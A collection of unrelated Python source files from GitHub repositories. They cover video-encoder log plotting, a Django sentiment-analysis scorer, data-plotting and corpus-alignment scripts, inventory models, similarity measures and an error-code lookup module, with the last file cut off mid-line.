+{"seq_id":"11248292056","text":"import matplotlib.pyplot as plt\nimport os\n\n\ndef get_file_basename(filename):\n return filename.split(\".\")[0]\n\n\ndef parse_log(log_file):\n data_list = []\n with open(log_file) as fp:\n for line in fp:\n dic = {}\n word_ls = line.split()\n i = 0\n while i < len(word_ls):\n dic[word_ls[i]] = 
float(word_ls[i + 1])\n i += 2\n data_list.append(dic)\n fp.close()\n return data_list\n\n\ndef extract_data(data_list, name):\n arr = []\n for data in data_list:\n arr.append(data[name])\n return arr\n\n\ndef visualize_q_indices(exp_summary, exp_list, fig_path=None):\n for exp in exp_list:\n data = parse_log(exp[\"log\"])\n q_indices = extract_data(data, \"q\")\n plt.title(exp_summary)\n plt.xlabel(\"frame_coding_idx\")\n plt.ylabel(\"q_index\")\n plt.plot(q_indices, marker=\".\", label=exp[\"label\"])\n plt.legend()\n if fig_path:\n plt.savefig(fig_path)\n else:\n plt.show()\n plt.clf()\n\n\ndef get_rc_type_from_exp_type(exp_type):\n if exp_type == \"Q_3P\":\n return \"q\"\n return \"vbr\"\n\n\ndef test_video(exe_name, input, exp_type, level, log=None, limit=150):\n basic_cmd = (\"--test-decode=warn --threads=0 --profile=0 --min-q=0 --max-q=63\"\n \" --auto-alt-ref=1 --kf-max-dist=160 --kf-min-dist=0 \"\n \"--drop-frame=0 --static-thresh=0 --minsection-pct=0 \"\n \"--maxsection-pct=2000 --arnr-maxframes=7 --arnr-strength=5 \"\n \"--sharpness=0 --undershoot-pct=100 --overshoot-pct=100 \"\n \"--frame-parallel=0 --tile-columns=0 --cpu-used=3 \"\n \"--lag-in-frames=48 --psnr\")\n rc_type = get_rc_type_from_exp_type(exp_type)\n rc_cmd = \"--end-usage=\" + rc_type\n level_cmd = \"\"\n if rc_type == \"q\":\n level_cmd += \"--cq-level=\" + str(level)\n elif rc_type == \"vbr\":\n level_cmd += \"--target-bitrate=\" + str(level)\n limit_cmd = \"--limit=\" + str(limit)\n passes_cmd = \"--passes=3 --second-pass-log=second_pass_log\"\n output_cmd = \"-o test.webm\"\n input_cmd = \"~/data/\" + input\n log_cmd = \"\"\n if log != None:\n log_cmd = \">\" + log\n cmd_ls = [\n exe_name, basic_cmd, rc_cmd, level_cmd, limit_cmd, passes_cmd, output_cmd,\n input_cmd, log_cmd\n ]\n cmd = \" \".join(cmd_ls)\n os.system(cmd)\n\n\ndef gen_ratectrl_log(test_case):\n exe = test_case[\"exe\"]\n video = test_case[\"video\"]\n exp_type = test_case[\"exp_type\"]\n level = test_case[\"level\"]\n log = test_case[\"log\"]\n test_video(exe, video, exp_type, level, log=log, limit=150)\n return log\n\n\ndef gen_test_case(exp_type, dataset, videoname, level, log_dir=None):\n test_case = {}\n exe = \"./aomenc_bl\"\n if exp_type == \"BA_3P\":\n exe = \"./aomenc_ba\"\n test_case[\"exe\"] = exe\n\n video = os.path.join(dataset, videoname)\n test_case[\"video\"] = video\n test_case[\"exp_type\"] = exp_type\n test_case[\"level\"] = level\n\n video_basename = get_file_basename(videoname)\n log = \".\".join([dataset, video_basename, exp_type, str(level)])\n if log_dir != None:\n log = os.path.join(log_dir, log)\n test_case[\"log\"] = log\n return test_case\n\n\ndef run_ratectrl_exp(exp_config):\n fp = open(exp_config)\n log_dir = \"./lowres_rc_log\"\n fig_dir = \"./lowres_rc_fig\"\n dataset = \"lowres\"\n for line in fp:\n word_ls = line.split()\n dataset = word_ls[0]\n videoname = word_ls[1]\n exp_type_ls = [\"VBR_3P\", \"BA_3P\"]\n level_ls = [int(v) for v in word_ls[2:4]]\n exp_ls = []\n for i in range(len(exp_type_ls)):\n exp_type = exp_type_ls[i]\n test_case = gen_test_case(exp_type, dataset, videoname, level_ls[i],\n log_dir)\n log = gen_ratectrl_log(test_case)\n exp = {}\n exp[\"log\"] = log\n exp[\"label\"] = exp_type\n exp_ls.append(exp)\n video_basename = get_file_basename(videoname)\n fig_path = os.path.join(fig_dir, video_basename + \".png\")\n visualize_q_indices(video_basename, exp_ls, fig_path)\n fp.close()\n\n\nif __name__ == \"__main__\":\n 
run_ratectrl_exp(\"exp_rc_config\")\n","repo_name":"WebKit/WebKit","sub_path":"Source/ThirdParty/libwebrtc/Source/third_party/libaom/source/libaom/tools/ratectrl_log_analyzer/analyze_ratectrl_log.py","file_name":"analyze_ratectrl_log.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"20113364762","text":"from django.http import HttpResponse\nimport requests, json\nfrom django.conf import settings\nimport pickle\nfrom . import service\nimport pandas as pd\nimport os\n\ndef preprosessor(request):\n service.excel_to_txt()\n fopen = open(r'.\\asset\\data.txt', 'r')\n i=0\n temp_list = []\n line = fopen.readlines()\n while True:\n if not line : break\n client_id = getattr(settings, 'NAVER_ID')\n client_secret = getattr(settings, 'NAVER_SECRET')\n url = \"https://naveropenapi.apigw.ntruss.com/sentiment-analysis/v1/analyze\"\n header = {\n \"X-NCP-APIGW-API-KEY-ID\": client_id,\n \"X-NCP-APIGW-API-KEY\": client_secret,\n \"Content-Type\": \"application/json\"\n }\n data = {\n 'content': line[i]\n }\n r = requests.post(url, data=json.dumps(data), headers=header)\n k = HttpResponse(r)\n temp_list.append(k.getvalue().decode('utf-8'))\n i+=1\n if i==len(temp_list)-2:\n break\n fopen.close()\n with open(r\".\\asset\\clova_data_dump.pickle\",'wb') as fs:\n pickle.dump(temp_list, fs)\n service.pickle_find_highlight()\n df = pd.read_pickle(r'.\\asset\\final_data.pickle')\n for i,k in zip(df.index, df['품사']):\n temp=[i,k]\n df=service.one_new_weight(temp)\n service.all_new_weight(df)\n return HttpResponse(i)\n\ndef sentiment_analysis(request):\n currentPath = os.getcwd()\n client_id = getattr(settings, 'NAVER_ID')\n client_secret = getattr(settings, 'NAVER_SECRET')\n url = \"https://naveropenapi.apigw.ntruss.com/sentiment-analysis/v1/analyze\"\n header = {\n \"X-NCP-APIGW-API-KEY-ID\": client_id,\n \"X-NCP-APIGW-API-KEY\": client_secret,\n \"Content-Type\": \"application/json\"\n }\n data = {\n 'content': json.loads(request.body)['dialog']\n }\n r = requests.post(url, data=json.dumps(data), headers=header)\n k = HttpResponse(r)\n temp = [k.getvalue().decode('utf-8')]\n if 'negative' not in temp[0].split(\":\")[2]:\n return 0\n pathname = os.path.join(currentPath, \"naverapi\", \"modules\", \"asset\", \"clova_data_dump.pickle\")\n print(temp)\n with open(pathname, 'wb') as fs:\n pickle.dump(temp, fs)\n service.pickle_find_highlight()\n df1=pd.read_pickle(currentPath + r'\\naverapi\\modules\\asset\\score_data.pickle')\n df2 =pd.read_pickle(currentPath + r'\\naverapi\\modules\\asset\\final_data.pickle')\n df3 = pd.read_pickle(currentPath + r'\\naverapi\\modules\\asset\\select_data.pickle')\n point = []\n rematch = []\n for i in df2.index:\n for k in df3.index:\n if i==k and df1.loc[k]['품사']==df3.iloc[k,2]:\n point.append(df3.iloc[k,4])\n break\n point=[]\n rematch=[]\n for i in df2.index:\n for k in df1.index:\n if i == k and df1.loc[k]['품사'] == df2.loc[i]['품사']:\n rematch.append([i, df1.loc[i]['품사']])\n point.append(df1.loc[i]['가중치'])\n break\n service.all_new_weight(service.one_new_weight(rematch))\n count = len(point)\n result_point=0\n point.sort(reverse=True)\n if count ==1:\n if point[0] >1:\n high_point = point[0]-0.5\n mid_point= high_point/2\n low_point =mid_point/2\n else:\n high_point = point[0]\n mid_point = point[0] / 2\n low_point = point[0] / 3\n elif count==2:\n if point[0]>1.5:\n high_point =point[0]-0.3\n mid_point= (point[0]+point[1])/2-0.3\n low_point= point[1]-0.3\n else:\n 
high_point = point[0]\n mid_point = (point[0] + point[1]) / 2\n low_point = point[1]\n elif count == 3:\n high_point = point[0]\n mid_point = point[1]\n low_point = point[2]\n else:\n high_point = sum(point[:int(count*0.3)])/len(point[:int(count*0.3)])\n mid_point = sum(point[int(count*0.3):int(count*0.6)])/len(point[int(count*0.3):int(count*0.6)])\n low_point = sum(point[int(count*0.6):])/len(point[int(count*0.6):])\n if count>=5 and low_point>1.5 :\n result_point = 5+count/5\n elif (mid_point+low_point)/2>1.4 or (high_point+mid_point+low_point)/3>1.6 or high_point>1.94 and count>=5:\n result_point = 4+count/5\n elif (high_point+mid_point+low_point)/3>1.3:\n result_point = 3+ count/5\n elif (high_point+mid_point+low_point)/3>1.0:\n result_point =2 + count/5\n elif (high_point+mid_point+low_point)/3>0.5:\n result_point = 1+count/5\n else:\n result_point = count/5\n return HttpResponse(result_point)","repo_name":"bong5472/depression_diagnose","sub_path":"server/naverapi/modules/Preprossor.py","file_name":"Preprossor.py","file_ext":"py","file_size_in_byte":4616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31412333004","text":"import plotly.plotly as py\nimport plotly.graph_objs as go\n\ndef trend(res):\n\ttrace_high = go.Scatter(\n\t\tx=[v[0] for v in res],\n\t\ty=[v[1] for v in res],\n\t\tname = \"Fatalities\",\n\t\tline = dict(color = '#17BECF'),\n\t\topacity = 0.8)\n\n\ttrace_low = go.Scatter(\n\t\tx=[v[0] for v in res],\n\t\ty=[v[2] for v in res],\n\t\tname = \"Injuries\",\n\t\tline = dict(color = '#7F7F7F'),\n\t\topacity = 0.8)\n\n\tdata = [trace_high, trace_low]\n\n\tlayout = dict(\n\t\ttitle='Fatalities and Injuries by Year',\n\t\txaxis=dict(\n\t\t\trangeslider=dict(),\n\t\t\ttype='date'\n\t\t\t)\n\t\t)\n\n\tfig = dict(data=data, layout=layout)\n\tp1=py.plot(fig, filename = \"trend plot\", auto_open=False)\n\treturn(p1)","repo_name":"hs220/Duke-CS-316","sub_path":"source code/app/Ploty/trend.py","file_name":"trend.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10541007747","text":"import chinese_corpus_translator\nimport candidate_parallel_sentence_pairs_searcher\nimport candidate_parallel_sentence_pairs_classifier\nimport configparser\nimport sys\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\nsys.path.insert(0, '../../common/')\nimport common\n\nclass ParallelSentencePairsIdentifier(object):\n def __init__(self):\n pass\n\n @staticmethod\n def result_analysis(predictions_path, gold_standard_path, en_path, zh_path, write_false_positive=False):\n correct_predictions_count = 0\n predictions_count = 0\n gold_standard_dict = {}\n\n # TODO path go to config\n if write_false_positive:\n en_file = common.read_two_columns_file_to_build_dictionary_type_specified(en_path, str, str)\n zh_file = common.read_two_columns_file_to_build_dictionary_type_specified(zh_path, str, str)\n count_source_in_gold = 0\n count_source_not_in_gold = 0\n\n with open(gold_standard_path) as f1:\n for line1 in f1:\n (target_id, source_id) = line1.rstrip('\\n').split(\"\\t\")\n gold_standard_dict[source_id] = target_id\n\n with open(predictions_path) as f2:\n false_positive = open(config['output_files_for_test_data']['false_positive'], 'w')\n for line2 in f2:\n predictions_count += 1\n (target_id_predicted, source_id_predicted) = line2.rstrip('\\n').split(\"\\t\")\n if source_id_predicted in gold_standard_dict:\n if 
gold_standard_dict[source_id_predicted] == target_id_predicted:\n correct_predictions_count += 1\n elif write_false_positive:\n false_positive.write('ingold\\n' + source_id_predicted+ '\\n' +en_file[source_id_predicted] + '\\n'\n +target_id_predicted+'\\n'+ zh_file[target_id_predicted] + '\\n\\n')\n count_source_in_gold += 1\n elif write_false_positive:\n false_positive.write(source_id_predicted+ '\\n' +en_file[source_id_predicted] + '\\n'\n +target_id_predicted+'\\n'+ zh_file[target_id_predicted] + '\\n\\n')\n count_source_not_in_gold += 1\n\n if write_false_positive:\n false_positive.write('count_source_in_gold' + str(count_source_in_gold))\n false_positive.write('count_source_not_in_gold' + str(count_source_not_in_gold))\n\n print('#real translations predicted (TP)', correct_predictions_count)\n print('#real translations (TP+FN)', len(gold_standard_dict))\n recall = correct_predictions_count / len(gold_standard_dict)\n print('recall (TP/(TP+FN))', recall)\n print('#translations predicted (TP+FP)', predictions_count)\n precision = correct_predictions_count / predictions_count\n print('precision (TP/(TP+FP))', precision)\n print('f1', 2 * (precision * recall) / (precision + recall))\n\n @staticmethod\n def intersection(dict1_path, dict2_path, pred_path):\n dict1 = dict()\n with open(dict1_path) as f:\n for line in f:\n (target_id, source_id) = line.rstrip('\\n').split(\"\\t\")\n if target_id not in dict1:\n dict1[target_id] = [source_id]\n else:\n dict1[target_id].append(source_id)\n\n dict2 = dict()\n with open(dict2_path) as f:\n for line in f:\n (target_id, source_id) = line.rstrip('\\n').split(\"\\t\")\n if target_id not in dict2:\n dict2[target_id] = [source_id]\n else:\n dict2[target_id].append(source_id)\n\n keys_a = set(dict1.keys())\n keys_b = set(dict2.keys())\n target_id_intersection = keys_a & keys_b\n print(target_id)\n\n pred = open(pred_path, 'w')\n for target_id in target_id_intersection:\n print(target_id)\n count = 1\n for source_id in dict1[target_id]:\n if source_id in dict2[target_id]:\n pred.write(target_id + '\\t' + source_id + '\\n')\n count += 1\n if count == 3:\n print('*************')\n\n @staticmethod\n def all():\n # # ------------------------------------- Translating ----------------------------------------------------------\n # print('\\033[94m[translating training target file]\\033[0m')\n # cct_train = chinese_corpus_translator.ChineseCorpusTranslator(\n # zh_en_dict_path=config['dictionary']['zh_en_dict_for_training_data'],\n # remove_chinese_stopwords=config.getboolean(\"preprocessing_text\", \"remove_chinese_stopwords\"),\n # english_remove_stopwords=config.getboolean(\"preprocessing_text\", \"remove_english_stopwords\"),\n # english_stem=config.getboolean(\"preprocessing_text\", \"english_stemming\"),\n # english_stem_for_dict=config.getboolean(\"preprocessing_text\", \"zh_en_dict_stemming\"),\n # chinese_tokenizer_mode_for_solr=config['preprocessing_text']['chinese_tokenizer_mode_for_solr'],\n # chinese_tokenizer_mode_for_overlap=config['preprocessing_text']['chinese_tokenizer_mode_for_overlap'])\n # cct_train.translate(\n # corpus_file_path=config['training_data']['zh'],\n # unknown_words_path=config['output_files_for_training_data']['unknown_words'],\n # translated_corpus_path=config['output_files_for_training_data']['translated_corpus_path'],\n # translated_corpus_for_selecter_path=\n # config['output_files_for_training_data']['translated_corpus_for_selecter_path'],\n # translated_corpus_for_overlap_path=\n # 
config['output_files_for_training_data']['translated_corpus_for_overlap_path'])\n #\n # print('\\033[94m[translating test target file]\\033[0m')\n # cct_test = chinese_corpus_translator.ChineseCorpusTranslator(\n # zh_en_dict_path=config['dictionary']['zh_en_dict_for_test_data'],\n # remove_chinese_stopwords=config.getboolean(\"preprocessing_text\", \"remove_chinese_stopwords\"),\n # english_remove_stopwords=config.getboolean(\"preprocessing_text\", \"remove_english_stopwords\"),\n # english_stem=config.getboolean(\"preprocessing_text\", \"english_stemming\"),\n # english_stem_for_dict=config.getboolean(\"preprocessing_text\", \"zh_en_dict_stemming\"),\n # chinese_tokenizer_mode_for_solr=config['preprocessing_text']['chinese_tokenizer_mode_for_solr'],\n # chinese_tokenizer_mode_for_overlap=config['preprocessing_text']['chinese_tokenizer_mode_for_overlap'])\n # cct_test.translate(\n # corpus_file_path=config['test_data']['zh'],\n # unknown_words_path=config['output_files_for_test_data']['unknown_words'],\n # translated_corpus_path=config['output_files_for_test_data']['translated_corpus_path'],\n # translated_corpus_for_selecter_path=\n # config['output_files_for_test_data']['translated_corpus_for_selecter_path'],\n # translated_corpus_for_overlap_path=\n # config['output_files_for_test_data']['translated_corpus_for_overlap_path'])\n\n # # ------------------------------------- Searching --------------------------------------------------------------\n # print('\\033[94m[Solr searching for training data]\\033[0m')\n # cpsps_train = candidate_parallel_sentence_pairs_searcher.CandidateParallelSentencePairsFinder(\n # index_file_path=config['output_files_for_training_data']['translated_corpus_path'],\n # index_file_for_solr_path=config['output_files_for_training_data']['corpus_for_solr'],\n # english_remove_stopwords=config.getboolean(\"preprocessing_text\", \"remove_english_stopwords_in_source\"),\n # english_stem=config.getboolean(\"preprocessing_text\", \"english_stemming_in_source\"))\n # cpsps_train.search_corpus(\n # searching_file_path=config['training_data']['en'],\n # output_path=config['output_files_for_training_data']['source_target_and_potential_targets_path'],\n # gold_standard_file_path=config['training_data']['gold'])\n #\n # # # Reverse searching test\n # # print('\\033[94m[Solr searching for training data]\\033[0m')\n # # cpsps_train = candidate_parallel_sentence_pairs_searcher.CandidateParallelSentencePairsFinder(\n # # index_file_path=config['training_data']['en'],\n # # index_file_for_solr_path=config['output_files_for_training_data']['corpus_for_solr'])\n # # cpsps_train.search_corpus(\n # # searching_file_path=config['output_files_for_training_data']['translated_corpus_path'],\n # # output_path=config['output_files_for_training_data']['source_target_and_potential_targets_path'],\n # # gold_standard_file_path=config['training_data']['gold'])\n #\n # print('\\033[94m[Solr searching for test data]\\033[0m')\n # cpsps_test = candidate_parallel_sentence_pairs_searcher.CandidateParallelSentencePairsFinder(\n # index_file_path=config['output_files_for_test_data']['translated_corpus_path'],\n # index_file_for_solr_path=config['output_files_for_test_data']['corpus_for_solr'],\n # english_remove_stopwords=config.getboolean(\"preprocessing_text\", \"remove_english_stopwords_in_source\"),\n # english_stem=config.getboolean(\"preprocessing_text\", \"english_stemming_in_source\"))\n # cpsps_test.search_corpus(\n # searching_file_path=config['test_data']['en'],\n # 
output_path=config['output_files_for_test_data']['source_target_and_potential_targets_path'])\n\n # ------------------------------------- Classifying ------------------------------------------------------------\n # print('\\033[94m[SVM training]\\033[0m')\n # cpspc_train = candidate_parallel_sentence_pairs_classifier.CandidateParallelSentencePairsClassifier()\n # cpspc_train.preprocessing_data(\n # source_target_and_potential_targets_path=\n # config['output_files_for_training_data']['source_target_and_potential_targets_path'],\n # translated_target_information_path=\n # config['output_files_for_training_data']['translated_corpus_for_selecter_path'],\n # translated_corpus_for_overlap_path=\n # config['output_files_for_training_data']['translated_corpus_for_overlap_path'],\n # source_information_path=config['training_data']['en'],\n # output_folder_path_prefix=config['output_files_for_training_data']['features_labels'])\n\n print('\\033[94m[SVM predicting]\\033[0m')\n cpspc_test = candidate_parallel_sentence_pairs_classifier.CandidateParallelSentencePairsClassifier()\n cpspc_test.prediction(\n training_folder_path=config['output_files_for_training_data']['features_labels'],\n test_source_target_and_potential_targets_path=\n config['output_files_for_test_data']['source_target_and_potential_targets_path'],\n test_translated_target_information_path=\n config['output_files_for_test_data']['translated_corpus_for_selecter_path'],\n test_translated_corpus_for_overlap_path=\n config['output_files_for_test_data']['translated_corpus_for_overlap_path'],\n test_source_information_path=config['test_data']['en'],\n test_output_folder_path_prefix=config['output_files_for_test_data']['features_labels']\n )\n\n\n# # Whole system test (Test run 1)\n# ParallelSentencePairsIdentifier.all()\nParallelSentencePairsIdentifier.result_analysis(\n predictions_path=config['output_files_for_test_data']['predictions'],\n gold_standard_path=config['test_data']['gold'],\n en_path=config['test_data']['en'],\n zh_path=config['test_data']['zh'],\n write_false_positive=True)\n\n# # Test run 2\n# ParallelSentencePairsIdentifier.result_analysis(\n# predictions_path='../data/predictions_config2_test',\n# gold_standard_path='../data/bucc2017/test_data/zh-en.test.gold')\n\n# # Test run 3\n# ParallelSentencePairsIdentifier.intersection(\n# dict1_path='../data/predictions',\n# dict2_path='../data/predictions_config2_test_10000',\n# pred_path='../data/predictions_config3_test'\n# )\n# ParallelSentencePairsIdentifier.result_analysis(\n# predictions_path='../data/predictions_config3_test',\n# gold_standard_path='../data/bucc2017/test_data/zh-en.test.gold')\n\n\n# ParallelSentencePairsIdentifier.result_analysis(\n# predictions_path='../data/predictions_intersection',\n# gold_standard_path='../data/bucc2017/training_data/zh-en.training.gold')\n","repo_name":"zzcoolj/Parallel-Sentences-Identifier","sub_path":"code/parallel_sentence_pairs_identifier.py","file_name":"parallel_sentence_pairs_identifier.py","file_ext":"py","file_size_in_byte":12818,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"17966263093","text":"from django.db import models\n\n\n# Create your models here.\n\nclass Podjetje(models.Model):\n naziv = models.CharField(default=\"/\",max_length=50)\n\nclass PoslovnaEnota(models.Model):\n naziv = models.CharField(default=\"/\",max_length=50)\n podjetje = models.ForeignKey(Podjetje,on_delete=models.CASCADE)\n \nclass Tip(models.Model):\n naziv = 
models.CharField(default=\"/\",max_length=30)\n kratica = models.CharField(default=\"/\",max_length=5)\n barva = models.CharField(default=\"yellow\",max_length=30)\n\nclass Dimenzija(models.Model):\n radij = models.CharField(default=\"/\",max_length=30)\n sirina = models.CharField(default=\"/\",max_length=30)\n visina = models.CharField(default=\"/\",max_length=30)\n special = models.BooleanField(default=False)\n dimenzija = models.CharField(default=\"/\",max_length=30)\n\n class Meta:\n ordering = ['radij', 'visina', 'sirina' , 'special']\n\n def __str__(self):\n return self.dimenzija\n \nclass Sestavina(models.Model):\n naziv = models.CharField(default=\"/\",max_length=30)\n dimenzija = models.ForeignKey(Dimenzija,default=None,blank=True, null=True,on_delete=models.CASCADE)\n tip = models.ForeignKey(Tip,default=None,blank=True, null=True,on_delete=models.CASCADE)\n lastnosti = models.ManyToManyField(\"LastnostSestavine\")\n\n def __str__(self):\n return self.naziv\n\nclass LastnostSestavine(models.Model):\n naziv = models.CharField(default=\"TRDOTA\", max_length=30)\n\nclass Zaloga(models.Model):\n naziv = models.CharField(default=\"/\",max_length=30)\n poslovnaEnota = models.ForeignKey(PoslovnaEnota, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.naziv\n\nclass VnosZaloge(models.Model):\n zaloga = models.ForeignKey(Zaloga,on_delete=models.CASCADE, related_name=\"vnosi\")\n sestavina = models.ForeignKey(Sestavina, on_delete=models.CASCADE, related_name=\"vnosi_zaloge\")\n lastnostSestavine = models.ForeignKey(LastnostSestavine,on_delete=models.SET_NULL, default=None, null=True, blank=True, related_name=\"vnosi_zaloge\")\n kolicina = models.FloatField(default=0)\n\nclass Baza(models.Model):\n zaloga = models.ForeignKey(Zaloga,default=None,null=True,blank=True,on_delete=models.SET_NULL)\n naziv = models.CharField(default=\"/\",max_length=30)\n tip = models.CharField(default=\"/\",max_length=30)\n status = models.CharField(default=\"aktivno\",max_length=30)\n datum = models.DateTimeField()\n\n def uveljavi(self):\n self.status = \"veljavno\"\n self.save()\n print(\"UVELJAVLJAM BAZO\")\n\nclass Paket(models.Model):\n baza = models.ForeignKey(Baza,default=None, null=True, blank=True, on_delete=models.SET_NULL)\n cas = models.DateTimeField()\n isModel = models.BooleanField(default=False)\n\nclass VnosDimenzijePaketa(models.Model):\n paket = models.ForeignKey(Paket, on_delete=models.CASCADE)\n dimenzija = models.ForeignKey(Dimenzija, on_delete=models.CASCADE)\n\nclass VnosTipaPaketa(models.Model):\n vnosDimenzijePaketa = models.ForeignKey(VnosDimenzijePaketa, on_delete=models.CASCADE)\n tip = models.ForeignKey(Tip,default=None,null=True,blank=True,on_delete=models.SET_NULL)\n lastnostSestavine = models.ForeignKey\n kolicina = models.IntegerField(default=0)\n\nclass VnosBaze(models.Model):\n baza = models.ForeignKey(Baza,on_delete=models.CASCADE, related_name=\"vnosi\")\n sestavina = models.ForeignKey(Sestavina,on_delete=models.CASCADE)\n lastnostSestavine = models.ForeignKey(LastnostSestavine, on_delete=models.SET_NULL, default=None, null=True, blank=True)\n stevilo = models.IntegerField(default=0)\n # NASTAVLJENO ZA BAZE TIPA KONTEJNER\n paket = models.OneToOneField(VnosTipaPaketa,default=None, null=True,blank=True, on_delete=models.CASCADE)\n cas = models.DateTimeField(default=None, null=True,blank=True)\n\nclass SpremembaZaloge(models.Model):\n vnos_baze = models.ForeignKey(VnosBaze, on_delete=models.CASCADE)\n vnos_zaloge = 
models.ForeignKey(VnosZaloge,on_delete=models.CASCADE)\n sprememba = models.FloatField()\n fiks = models.BooleanField(default=False)\n cas = models.DateTimeField()","repo_name":"TadejGrof/LaBodega","sub_path":"proizvodnja/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12138488543","text":"import gzip\nimport csv\n#import pandas as pd\n\nseqs = [] # stores dna/rna sequences\ndescriptors = [] # stores description of sequences\nclasses = [] # stores 1 for positive and 0 for negative\n\n# parse file of positives\nwith open(snakemake.input[0], 'r') as fasta_file:\n for line in fasta_file:\n if line[0] == '>':\n descriptors.append(line)\n else:\n seqs.append(line)\n classes.append(1)\n\n# parse file of negatives\nwith open(snakemake.input[1], 'r') as fasta_file:\n for line in fasta_file:\n if line[0] == '>':\n descriptors.append(line)\n else:\n seqs.append(line)\n classes.append(0)\n\ncounter = 0\nwith open(snakemake.output[0], 'w', newline='') as csvfile:\n # fieldnames = ['FoldID', 'EventID seq', 'Bound']\n # writer = csv.DictWriter(csvfile, fieldnames, delimiter='\\t', lineterminator='\\n')\n\n # writer.writeheader()\n # writer.writerow({'FoldID': 'A', 'EventID seq': f'seq_{counter:05d}_peak', 'Bound': (seqs[0] +\n # '\\t1')})\n csvfile.write('FoldID\\tEventID seq\\tBound\\t\\n')\n for seq, clas in zip(seqs, classes):\n csvfile.write(f'A\\tseq_{counter:07d}_peak\\t{seq[:100]}\\t{clas}\\n')\n counter += 1\n","repo_name":"julianhesse/Bachelor-Project","sub_path":"scripts/preprocess_deepbind.py","file_name":"preprocess_deepbind.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25330323772","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom numpy import *\nfrom numpy import linalg as la\ndef loadExData():\n return [[1,1,1,0,0],\n [2,2,2,0,0],\n [5,5,5,0,0],\n [1,1,0,2,2],\n [0,0,0,3,3],\n [0,0,0,1,1]]\n\n# 利用不同的方法计算相似度\ndef eulidSim(inA, inB):\n return 1.0/(1.0+la.norm(inA - inB))#根据欧式距离计算相似度\n\ndef pearsSim(inA, inB):\n if len(inA)<3:\n return 1.0\n else:\n return 0.5+0.5*corrcoef(inA, inB, rowvar = 0)[0][1]\n\ndef cosSim(inA, inB):\n num = float(inA.T*inB) #向量inA和向量inB点乘,得cos分子\n denom = la.norm(inA)*la.norm(inB) #向量inA,inB各自范式相乘,得cos分母\n return 0.5+0.5*(num/denom) #从-1到+1归一化到[0,1]\n\nmyMat = mat(loadExData())\nprint(eulidSim(myMat[:,0], myMat[:,4])) #第一行和第五行利用欧式距离计算相似度\nprint(eulidSim(myMat[:,0], myMat[:,0])) #第一行和第一行欧式距离计算相似度\nprint(cosSim(myMat[:,0], myMat[:,4])) #第一行和第五行利用cos距离计算相似度\nprint(cosSim(myMat[:,0], myMat[:,0])) #第一行和第一行利用cos距离计算相似度\nprint(pearsSim(myMat[:,0], myMat[:,4])) #第一行和第五行利用皮尔逊距离计算相似度\nprint(pearsSim(myMat[:,0], myMat[:,0])) #第一行和第一行利用皮尔逊距离计算相似度\n\nprint(myMat)","repo_name":"Wangman1/Machine-Learning-in-Action","sub_path":"My Code/chap 14/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18420590803","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @namespace pyfortified_requests\n\nfrom pyhttpstatus_utils import HTTP_STATUS_DESC_DICT\nfrom pyhttpstatus_utils import HTTP_STATUS_PHRASE_DICT\n\nREQUESTS_FORTIFIED_ERROR_NAME_DICT = {\n -1: 'Unassigned',\n 0: 'Success',\n 600: 'Module Error',\n 601: 'Argument Error',\n 602: 'Request Error',\n 603: 'Software Error',\n 604: 'Unexpected 
Value',\n    605: 'Request HTTP',\n    606: 'Request Connect',\n    607: 'Request Redirect',\n    608: 'Retry Exhausted',\n    609: 'Unexpected content-type returned',\n    610: 'Upload Data Error',\n    611: 'Auth Error',\n    612: 'Auth JSON Error',\n    613: 'Auth Response Error',\n    614: 'JSON Decoding Error',\n    699: 'Unexpected Error'\n}\n\nREQUESTS_FORTIFIED_ERROR_DESC_DICT = {\n    -1: 'Unassigned exit condition',\n    0: 'Successfully completed',\n    600: 'Error occurred somewhere within module',\n    601: 'Invalid or missing argument provided',\n    602: 'Unexpected request failure',\n    603: 'Unexpected software error was detected',\n    604: 'Unexpected value returned',\n    605: 'Request HTTP error occurred',\n    606: 'Request Connection error occurred',\n    607: 'Request Redirect',\n    608: 'Retry Exhausted',\n    609: 'Unexpected content-type returned',\n    610: 'Upload Data Error',\n    611: 'Auth Error',\n    612: 'Auth JSON Error',\n    613: 'Auth Response Error',\n    614: 'JSON Decoding Error',\n    699: 'Unexpected Error'\n}\n\n\ndef error_name(error_code, return_bool=False):\n    \"\"\"Provide definition of Error Code\n\n    Args:\n        error_code:\n\n    Returns:\n\n    \"\"\"\n    if error_code is None or not isinstance(error_code, int):\n        return \"Error Code: Invalid Type: %s\" % error_code\n\n    exit_code_name_ = HTTP_STATUS_PHRASE_DICT.get(error_code, None)\n    if exit_code_name_ is not None:\n        return exit_code_name_\n\n    exit_code_name_ = REQUESTS_FORTIFIED_ERROR_NAME_DICT.get(error_code, None)\n    if exit_code_name_ is not None:\n        return exit_code_name_\n\n    return False if return_bool else \"Error Code: Undefined: %d\" % error_code\n\n\ndef error_desc(error_code, return_bool=False):\n    \"\"\"Provide definition of Error Code\n\n    Args:\n        error_code:\n\n    Returns:\n\n    \"\"\"\n    if error_code is None or not isinstance(error_code, int):\n        return \"Error Code: Invalid Type: %s\" % error_code\n\n    exit_code_description_ = HTTP_STATUS_DESC_DICT.get(error_code, None)\n    if exit_code_description_ is not None:\n        return exit_code_description_\n\n    exit_code_description_ = REQUESTS_FORTIFIED_ERROR_DESC_DICT.get(error_code, None)\n    if exit_code_description_ is not None:\n        return exit_code_description_\n\n    return False if return_bool else \"Error Code: Undefined: %d\" % 